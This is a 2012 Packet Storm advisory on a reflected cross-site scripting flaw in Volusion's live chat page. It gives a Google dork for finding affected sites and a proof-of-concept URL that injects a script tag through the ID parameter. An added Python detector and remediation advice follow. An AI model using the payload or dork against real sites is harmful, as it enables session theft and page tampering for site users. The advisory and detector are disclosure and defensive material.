Volusion Chat Cross Site Scripting

2012-03-15T00:00:00
ID PACKETSTORM:110811
Type packetstorm
Reporter Sony
Modified 2012-03-15T00:00:00

Description

`# Exploit Title: Volusion Chat Cross Site Scripting  
# Date: 15.03.2012  
# Author: Sony  
# Software Link: http://www.volusion.com/  
# Google Dorks: inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/03/volusion-chat-cross-site-scripting.html  
..................................................................  
  
  
https://livechat03.volusion.com/livechat.aspx?ID=24342[our xss is here]&location=http%3A//www.volusion.com/&auto=0&cookieGuid=  
  
https://livechat03.volusion.com/livechat.aspx?ID=24342%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&location=http%3A//www.volusion.com/&auto=0&cookieGuid=  
  
http://4.bp.blogspot.com/-CSpnn8fNIYY/T2EGeu_u41I/AAAAAAAAAvM/TcpwDTdCLUA/s1600/volusion.JPG  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`
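
A defensive check for the issue reported above, as an added example that is not part of the original advisory: it flags livechat.aspx requests whose ID parameter is not a plain number or carries markup characters after percent-decoding. The numeric-only ID format, the `classify` and `scan` names, and the last two sample request targets are assumptions; the first two samples reuse the advisory's own query strings.

```python
import re
from urllib.parse import urlsplit, parse_qsl

NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # assumption: IDs are short decimal numbers (e.g. 24342)
MARKUP = re.compile(r"[\"'<>]")           # characters that can break out of an attribute or tag

def classify(request_target):
    """Classify one request target: 'not-livechat', 'missing-id', 'ok',
    'non-numeric-id' or 'markup-in-id'."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/livechat.aspx"):
        return "not-livechat"
    # parse_qsl percent-decodes once, so the checks below see the decoded value.
    ids = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
           if k.lower() == "id"]
    if not ids:
        return "missing-id"
    verdict = "ok"
    for value in ids:
        if MARKUP.search(value):
            return "markup-in-id"
        if not NUMERIC_ID.fullmatch(value):
            verdict = "non-numeric-id"
    return verdict

def scan(request_targets):
    """Return (target, verdict) pairs for livechat requests whose ID is not a plain number."""
    hits = []
    for target in request_targets:
        verdict = classify(target)
        if verdict in ("non-numeric-id", "markup-in-id"):
            hits.append((target, verdict))
    return hits

# Sample request targets as they would appear in an access log.
# 1: advisory URL with a plain numeric ID; 2: advisory PoC query string; 3-4: constructed.
SAMPLES = [
    "/livechat.aspx?ID=24342&location=http%3A//www.volusion.com/&auto=0&cookieGuid=",
    "/livechat.aspx?ID=24342%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E"
    "&location=http%3A//www.volusion.com/&auto=0&cookieGuid=",
    "/livechat.aspx?id=24342abc&auto=0",
    "/default.aspx?ID=%3Cb%3E",
]

if __name__ == "__main__":
    for target, verdict in scan(SAMPLES):
        print(verdict, target)
```

The same numeric-only rule applied server-side before the ID is written into the page, together with HTML attribute encoding on output, removes the reflection shown in the PoC.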